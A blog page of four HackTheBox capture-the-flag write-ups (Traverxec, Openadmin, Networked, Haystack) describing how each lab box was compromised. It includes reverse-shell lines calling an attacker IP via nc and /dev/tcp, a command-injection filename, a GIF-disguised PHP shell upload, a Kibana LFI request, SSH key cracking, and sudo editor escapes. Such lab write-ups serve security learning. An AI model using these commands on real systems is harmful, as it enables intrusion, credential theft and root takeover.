All Posts:

2020
April

Traverxec
January

Openadmin
2019
November

Networked

SSH Tunnel

Netcat

Haystack

Htb-writeup

Techniques

Category: Htb-writeup

Traverxec 2020-04-11

TRAVERXEC@HTB

Banner Traverxec is an easy box from hackthebox. Ok let’s start.

Quick Hack:

User: Port Scan > 80/http > nostromo server > search for exploit > metasploit exploit > reverse shell > reading nostromo conf and manual > getting ssh creds in a directory > ssh as david > user.txt Root: david > reading server-stats.sh script > sudo without password for a perticular command > abusing it with vim > root.txt

US3R

Run nmap to find open ports. Nmap will show result like this: nmap scan We have two open ports; 22 is ssh and 80 is http. Open http in browser. There is nothing interesting other than a name David White, which may be a potential user name. Just take a note. View source nothing there. Nmap says it is running nostromo 1.9.6,any 404 error also shows the same. web Ok so let’s learn about nostromo. After some reading I came to know that it is a web server. Ran searchsploit against it, got a Directory Traversal RCE but that is for an older version. I googled for nostromo 1.9.6 vulnarebilites and got a metasploit exploit for RCE. Exploit Recently there is a python exploit too,but I didn’t used that,metasploit worked fine for me. Exploit python Ran the metasploit exploit and got a session as www-data but I transfered it to a netcat session and stebilized it. netcat shell Now from this point you can run linenum or linpeas but it doesn’t helps.Looking at /home directory,there is only one user david,we don’t have read or write access to this directory,this is not normal,normally read access to this directory is given. Let’s go to nostromo server directory to see if we can find there anything interesting. 
cd /var/nostromo
Let’s go to conf folder. There is a file nhttpd.conf nhttpd file To understand this file we have to read the documentaion of nostromo server. Let’s google it. nostromo documentation I read it several time to understand how everything works. At homedirs part it says it can serve users home directory as docroot. That is interesting as we don’t have reading access to users home directory. There is another option to restrict access user home directory by setting up homedirs_public option in .conf file. Let’s look at nhttpd.conf file again. It sets up homedirs_public to public_www. documentation So there must be a directory named public_www in users home directory. 
cd /home/david/public_www
public_www It works.Ahhhhh,thats why there was no read access to this /david directory,so that we can’t find it easily! List files, there is a directory name protected-file-area. Let’s go there. There is a file name backup-ssh-identity-files.tgz . gzip This is a tar gzip file,name suggests it has ssh creds. Ok let’s extract it to /tmp folder. 
tar zxvf backup-ssh-identity-files.tgz -C /tmp
cd /tmp
ls -la
it creates a folder /home,let’s go there. 
cd home
there is a folder david and within it there is a folder .ssh let’s go there. There are three files. id_rsa, id_rsa.pub, authorized_keys. Get this files and try to login with private key. 
ssh -i id-rsa david@10.10.10.165
ooops! It asks for passphrase. Ok,give this file to john to crack it. 
python ssh2john.py id_rsa > id_rsa.john
john id_rsa.john --wordlist=/usr/share/wordlists/rockyou.txt
john cracks it very soon and the passphrase is “hunter”. Ok, now login with this crades and get the user flag. user flag

R00T

Getting root is easy. David’s home directory has two files. server-stats.head and server-stats.sh Run the shell script. It prints nostromo server information. Ok let’s check the script. 
cat server-stats.sh
server Everything is fine but last line is interesting. Running sudo without password. Copy that last line and run it from terminal it works fine. But how to exploit that? Ok let’s remove the cat command from the end part and it still works. It prints server information,now press v when it is showing the server details. It opens in vim. now type 
:!/bin/sh
It opens shell as root. How do I know to exploit it in this way? This is a similar hack which was given in bandit game of overthewire. You can play that awesome game here. When I remove the cat command it opens in “more” or “less”. And this is a feature of that tool that when you type ‘v’ it opens in vim. Vim is powerful text editor in linux,but most importantly you can run command from vim. And thats what I did,as vim was opened as root I just opened shell from there and became root. You can learn what you can do with vim from gtfobins. How do I know it opened it “more” or “less”? Just by looking at the left below corner of the terminal. more root flag Hope you enjoyed; Happy Hacking. more...

Openadmin 2020-01-30

OPENADMIN@HTB

Banner Openadmin is an easy box from hackthebox. Ok let’s start.

Quick Hack:

Initial foothold: Port Scan > 80/http > /music site > login link > OpenNetAdmin panel > exploit for that version > modify and run it > get login details for jimmy. User1: ssh as jimmy > run id > find files for group internal > internal service running on localhost > ssh port forwarding > modify one script > open the service > get ssh key for joanna. User2: Crack the ssh key > ssh as joanna > user.txt Root: run sudo -l > one sudo command without password > GTFO bins > abusing the nano editor > root.txt

INITIAL FOOTHOLD

Run nmap to find open ports. Nmap will show result like this: nmap scan We have two open ports; 22 is ssh and 80 is http. Open http in browser. Default apache config page,nothing interesting there. So let’s run gobuster. 
gobuster dir -u http://10.10.10.171 -w /usr/share/worldlists/dirbuster/directory-list-2.3-medium.txt
After running it will start to find other sites,the result will look loke this: gobuster Let’s go to the /music folder. It is a site itself. Look at the links on the site,login and create an account could be potential entry point to something interesting. Login link links to somewhere else “/ona”.Open it,it opens to a new service. OpenNetAdmin . And also reveals its version; it is 18.1.1 .Search for exploit for this version of Opennetadmin. ona 
searchsploit opennetadmin
And it gives result of RCE is present on that version. one shell script and a metasploit module is present of the exploit.I took the shell script. searchsploit But the shell script does not work as it is,you have to do some modification to run it. So, I made the modifications and put it on github,get it from here. Run it. 
./script.sh http://10.10.10.171/ona 10.10.xx.xx
You will get a shell,but it is not a fully functional reverse shell. So from here you can upload a php reverse shell script and get a reverse shell and work with that. Or you can get the information what you need for the next step and close it. How to use php reverse shell I have explained in networked writeup. Ok,now you have got a shell as www-data,let’s go for a user.

US3R 1 - JIMMY

As www-data you will land on /opt/ona/www and you can’t run cd here.Run cat on /etc/passwd and you will get two users there jimmy and joanna. 
cat /etc/passwd
Run ls and you will see bunch of files and directories,start enumarating them. I am only showing the path where you will get something interesting. 
ls local/
ls local/config/
cat local/config/database_settings.inc.php
local dbpasswd Here in this file you will get a password for the mysql database,grab that password and try to login with that as joanna and jimmy. You will be able to login as jimmy with that pasword. But here there is no user flag so you have to be joanna to get the user flag. Well as www-data you can also run local prevesc scripts like linenum or linpeas, but that didn’t helped me so I am omitting that part.

US3R 2 - JOANNA

Ok as always I try ps -aux, sudo -l, id, crontab -l etc to get basic idea about that user,group,what the user can do and if there is any cron running. id says jimmy is a member of a special group name internal . That’s interesting,let’s see who are the members of that group. 
cat /etc/group
We can see that joanna is also a member of that group. Ok,let’s check files and folders belongs to that group. 
find / -group 1002 2>/dev/null #1002 is the id of that group
We get it: internal Ok,let go there and see files. 
cd /var/www/internal
ls -la
there are three files,but interesting one is main.php. Cat all the files and find what are there. In main.php it varifies if the user is authenticated as jimmy,if yes it runs command to cat private ssh key for joanna and prints it if not varified it redirects to authentication page. But how to reach to the internal directory from browser? We didn’t get any directory for that in gobuster. Then what to do? You can run: 
ss -lt
It will list all the listening port on tcp and among others there is a port 52846. That is unknown and listening on localhost. Or you can go to apache config directory and see whats going there. 
cd /etc/apache2/apache2.conf
At the bottom it says to look into sites_enabled/ directory for virtual hosting. Going there we can find internal.conf file. 
cd sites-enabled/
cat internal.conf
vhosts It says it is listening on 127.0.0.1:52846. It it matches our previous finding from ss -lt. Ok to reach to service listening on localhost we have to do ssh port forwarding.I have discussed it in details here. 
ssh -L 8000:localhost:52846 jimmy@10.10.10.171
now open in browser localhost:8000/main.php . Damn!it redirects to index page for authentication. Ok get back to the box,go to the internal folder and copy the main into another file and open in vim to edit it. 
cp main.php main2.php
vim main2.php
main.php And then remove everthing that redirects to index page for authentication,mainly remove everything in the first line after <?php tag. Then open main2 in browser localhost:8000/main2.php . Gotcha! it prints ssh private key of joanna. Copy in and put in into a file and change its permissions. 
nano id_rsa #paste it here and save the file
chmod 600 id_rsa
Try to login with it,and you can’t,it asks for passphrase. Give that file to john to crack it. 
./ssh2john id_rsa > id_rsa.john #converting it to a format that john can understand

john id_rsa.john  -wordlist=/usr/share/wordlists/rockyou.txt
john cracks it very fast and gives the passpharse. Login with it as joanna and grab the flag: 
ssh -i id_rsa joanna@10.10.10.171
user

R00T

As joanna try: 
sudo -l
sudo And joanna can run /bin/nano /opt/priv as sudo without password. Wow thats cool…How to exploit it? Go to gtfobins and type nano to find how to exploit nano and at the end you can find how to get a shell when it is running with sudo previlage. 
Ctrl+r Ctrl+x
reset; sh 1>&0 2>&0
Press enter and thats it,you get a shell as root.Go grab the flag and submit it. That’s all. root flag Hope you enjoyed; Happy Hacking. more...

Networked 2019-11-16

NETWORKED@HTB

Banner Networked is an easy box from hackthebox. Ok let’s start.

Quick Hack:

User: Port Scan > 80/http > view-source or dirbuster > uploads.php & photos.php > php file upload > reverse shell > user home directory > crontab.guly, check_attack.php > create file in /uploads dir > rev shell as user guly > user.txt Root: guly > sudo –l > sudo permission for execution of changename.sh without password > run it accordingly > root.txt

US3R

Run nmap to find open ports. Nmap will show result like this: nmap scan We have two open ports; 22 is ssh and 80 is http. Open it in browser and there is nothing interesting so let’s view source. upload path There is a comment about upload and gallery. So, put uploads.php in url and you can find upload page but it says it should be an image file. you can also find photos.php where you can see uploaded files. [You may not be able to find the uploads.php and photos.php manually so here you can run dirbuster or gobuster to directory brute force: 
gobuster dir –u http://10.10.10.146/ -w /usr/share/wordlist/dirbuster/directory-list-2.3-medium.txt –x php
It will give what you need] Now you have to find a way how to upload reverse shell. As it is running php download a php reverse shell script from google, edit the IP and port. As it says it should be an image file there should be some filtering which you have to bypass. Change the name of your shell script. 
mv php-reverse-shell.php php-reverse-shell.php.gif
This isn’t enough you have to add magic byte of GIF file at the begging of the shell, for gif it is GIF89;a shell Ok, now set up a netcat listener on the port you set up in script, upload the file and access the photos.php instantly you will get a reverse shell as apache. Go to user home directory, you will find the user flag but you can’t read it as apache. You have to be guly to get it. apache Read crontab.guly and check_attack.php . crontab Crontab says there is a cron running for the script check_attack.php. Let’s check this php script. php script Read it carefully. If you put a file in /var/www/html/uploads directory its name will be value of $value variable. So, if the name of the file is an executable command, it will be executed. This box has netcat installed so let’s try to get a netcat reverse shell. Go to /uploads directory, and create a file 
touch “;nc –c bash <your ip> 443;#”
set an nc listener on port 443 and within a minute you will get a reverse shell as guly. user flag

R00T

Getting root is easy. Type 
sudo –l
as guly to see what permission this user has. sudo path guly can run a script as sudo without password. Go to that directory and try to run it as sudo. It asks for some arguments. hint to root See at the error message. base64 –decode is given as input and it treats –decode as a command, so what you put here after a space is treated as a command.Read more about this vulnarebility Now try this: Put 
/bin/bash
after a space and you get shell as root. Yup that’s it. root flag Hope you enjoyed; Happy Hacking. more...

Haystack 2019-11-08

HAYSTACK@HTB

Banner Haystack is an easy box from hackthebox. Ok let’s start.

Quick Hack:

User: Port Scan > 80/http >download image > run strings > base64 –decode. 9200/http > search in quote db > base64 –decode > user & password > ssh as security > user.txt Root: security > kibana lfi >rev shell as kibana >/etc/logstash/conf.d> grok filter > put file in /opt/kibana/logstash_*>rev shell as root> root.txt

US3R

Run nmap to find open ports. Nmap will show result like this: nmap scan We have open ports; 22 is ssh, 80 is http, 9200 also http. Open 80 in browser and there is picture of needle in haystack, download it, run strings against it. There is a base64 encoded string in the last line,save it in a file and decode it. Base64 
base64 –decode file.b64.
it is a line in Spanish, use google translator if you don’t know Spanish (the whole box is in Spanish, learning some Spanish is extra gain). The line says needle in a haystack is the “key”. Keep it; it will help in future.
Let’s look at port 9200. It says it is elasticsearch. 9200 port Run gobuster in the background on port 9200. 
gobuster dir –u http://10.10.10.115:9200/ -w /usr/share/wordlist/dirbuster/directory-list-2.3-medium.txt
gobuster Let’s look at those urls. It dumps some data in Spanish, not very useful. Go for elasticsearch and ELK stash documentation and try to figure out how to dump data from the database. After some study I found this search can help to pass query: 
http://10.10.10.115:9200/_search?q=
We found “clave” (key in spanish) in the needle image, so let’s do this: 
http://10.10.10.115:9200/_search?q=quote:clave
key There are two base64 encoded strings, decode it. It is
user:security
pass:spanish.is.key
Login into ssh with those credentials, and get user flag. user

R00T

Now run linenum to enumerate the box. Look closely, logstash is running as root that is not normal, it should run as logstash. But user security can’t read write logstash config files but kibana can do that. So, not let’s try to be kibana. Search on google for kibana vulnerabilities, and you will find LFI (local file inclusion) vulnerability Read more The system is running node.js so download a js reverse shell payload and put it into /tmp folder. shell Now run this: 
curl “http://127.0.0.1:5601/api/console/api_server?sense_version=@@SENSE_VERSION&apis=../../../../../../.../../../../tmp/rev.js”
Set a netcat listener on 9001, as per script, you will get a reverse shell as kibana (you may not a get a shell sometimes and it is frustrating, form url properly or change name of the .js file and try again, it will work). kibana Now go to 
etc/logstash/conf.d
folder, there are 3 files, input.conf, filter.conf and output.conf. config files These files say a file in /opt/kibana with name logstash_* will be executed as root user if it is structured properly. Create a file in /opt/kibana with name logstash_hello : 
echo ‘Ejecutar comando : bash –i >& /dev/tcp/10.10.15.44/9005 0>&1’ > /opt/kibana/logstash_hello
Set a netcat listener and wait a while; get the reverse shell as root. That’s it. (ooh, I lost that screenshot, a I don’t want to do this annoying box again!!) Hope you enjoyed; Happy Hacking. more...